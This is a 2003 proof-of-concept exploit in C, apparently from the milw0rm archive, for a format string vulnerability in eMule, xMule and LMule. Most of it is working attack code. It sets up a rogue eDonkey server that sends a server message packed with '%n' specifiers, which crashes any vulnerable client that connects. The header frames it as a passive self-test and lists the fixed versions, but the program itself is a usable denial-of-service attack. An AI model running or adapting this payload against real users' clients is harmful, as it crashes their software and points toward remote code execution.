eMule/xMule/LMule - OP_SERVERMESSAGE Format String Vulnerability

/*
 * eMule/xMule/LMule OP_SERVERMESSAGE Format String Vulnerability
 * (SecurityFocus BID 8443)
 * proof of concept code
 * version 1.0 (Aug 29 2003)
 *
 * by Rémi Denis-Courmont
 *
 * This vulnerability was found by:
 *   Stefan Esser <s.esser@e-matters.de>
 * whose original advisory may be fetched from:
 *   http://security.e-matters.de/advisories/022003.html
 *
 * Vulnerable:
 *  - eMule v0.29c -> wait for server connection timeout (!?! I need help !?!)
 *  - xMule stable v1.4.3 -> crash
 *  - xMule unstable v1.5.6a -> crash
 *  - Lmule v1.3.1 (NOT tested) -> ???
 *
 *   There is something wrong with eMule 0.29c (exception handling) and it
 * refuses to crash.
 *
 * Not vulnerable:
 *  - xMule stable v1.6.0,
 *  - eMule v0.30a.
 *
 *   As a format string vulnerability over a possibly large format input
 * buffer, experienced assembly coders (ie. NOT me) should be able to exploit
 * this vulnerability (you can find as much as 2 mega-bytes available in the
 * stack in the socket input buffer, and the message is also duplicated on
 * the heap and can be as long as 65535 bytes). However, getting clients to
 * connect to while not impossible, will be very very hard: Even though many
 * clients adds current server of other clients to their own server lists, so
 * that you can promote yourself as a server by actively connecting to others,
 * it is unlikely that your "server" will be selected from the list which
 * often exceeds 100 entries.
 *   Anyway, the following proof-of-concept is entirely passive, so you will
 * probably only be able to test it against yourself (which is very fine,
 * because you usually are you only legal victim).
 */


/*****************************************************************************
 * Copyright (C) 2003  Rémi Denis-Courmont.  All rights reserved.            *
 *                                                                           *
 * Redistribution and use in source and binary forms, with or without        *
 * modification, are permitted provided that the following conditions        *
 * are met:                                                                  *
 * 1. Redistributions of source code must retain the above copyright         *
 *    notice, this list of conditions and the following disclaimer.          *
 * 2. Redistributions in binary form must reproduce the above copyright      *
 *    notice, this list of conditions and the following disclaimer in the    *
 *    documentation and/or other materials provided with the distribution.   *
 *                                                                           *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR      *
 * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES *
 * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.   *
 * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,          *
 * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT  *
 * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, *
 * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY     *
 * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT       *
 * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF  *
 * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.         *
 *****************************************************************************/

#include <stdio.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <netdb.h>

int gai_errno = 0;

void
gai_perror (const char *str)
{
    if ((gai_errno == EAI_SYSTEM) || (gai_errno == 0))
        perror (str);
    else
        fprintf (stderr, "%s: %s\n", str, gai_strerror (gai_errno));
}


int
socket_listen (const char *hostname, const char *servname)
{
    struct addrinfo hints, *res;

    hints.ai_family = PF_INET;
    hints.ai_socktype = SOCK_STREAM;
    hints.ai_protocol = 0;
    hints.ai_flags = AI_PASSIVE;

    if ((gai_errno = getaddrinfo (hostname, servname, &hints, &res)) == 0)
    {
        struct addrinfo *ptr;

        for (ptr = res; ptr != NULL; ptr = ptr->ai_next)
        {
            int sock;

            sock = socket (ptr->ai_family, ptr->ai_socktype,
                    ptr->ai_protocol);
            if (sock != -1)
            {
                const int val = 1;

                setsockopt (sock, SOL_SOCKET, SO_REUSEADDR,
                        &val, sizeof (val));
                if (bind (sock, ptr->ai_addr, ptr->ai_addrlen)
                 || listen (sock, INT_MAX))
                    close (sock);
                else
                {
                    /* success! */
                    freeaddrinfo (res);
                    return sock;
                }
            }
        }
        freeaddrinfo (res);
    }
    return -1;
}


int
send_server_message (int fd/*, const char *message*/)
{
    /*
     * Note that eDonkey is an Intel-centric protocol that sends/receives
     * everything in counter-network-byte order (ie. low order first).
     */
    uint8_t buf[] =
        "\xE3" // protocol
        "\x70\x01\x00\x00" // packet size
        "\x38" // command (Server message)
        "\x6D\x01" // message length (xMule ingores it, eMule reads it)
        "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n\n"
        "Welcome to messmule, a proof-of-concept for:\n"
        "eMule/xMule/Lmule OP_SERVERMESSAGE\n"
        "Format String Vulnerability\n"
        "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n\n"
        "If you can read this message from your Server info box,\n"
        "your client is probably not affected by that vulnerability.\n"
        "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n\n"
        ;

    return (send (fd, buf, sizeof (buf) - 1, 0) != (sizeof (buf) - 1));
}


static int
usage (const char *path)
{
    printf (
"Syntax: %s [port [hostname|IP]]\n"
"        Attempt to crash eMule/xMule/LMule clients which will connect to\n"
"        the specified server port (or 4661 by default), at the local\n"
"        host address (or any available address by default)\n", path);

    return 2;
}


int
main (int argc, char *argv[])
{
    puts ("eMule/xMule/LMule OP_SERVERMESSAGE "
            "Format String Vulnerabilitytion Vulnerability\n"
        "proof of concept code\n"
        "Copyright (C) 2003 Rémi Denis-Courmont "
            "<exploit@simutrans.fr.st>\n");
    if (argc > 3)
        return usage (argv[0]);
    else
    {
        int listenfd;
        const char *host, *port;

        port = (argc < 2) ? "4661" : argv[2];
        host = (argc < 3) ? NULL : argv[3];
        printf ("Binding to [%s]:%s ...\n",
            (host != NULL) ? host : "any", port);
        listenfd = socket_listen (host, port);
        if (listenfd == -1)
        {
            gai_perror (host);
            return 1;
        }

        while (1)
        {
            int clientfd;

            fputs ("Waiting for a client to connect ... ", stdout);
            clientfd = accept (listenfd, NULL, 0);
            if (clientfd == -1)
            {
                puts ("");
                perror ("Error");
                continue;
            }
            puts ("OK");
            fputs ("Sending server message ... ", stdout);
            if (send_server_message (clientfd))
            {
                puts ("");
                perror ("Error");
            }
            else
                puts ("Done");
            close (clientfd);
        }
    }

    return 0; /* dead code */
}


// milw0rm.com [2003-09-01]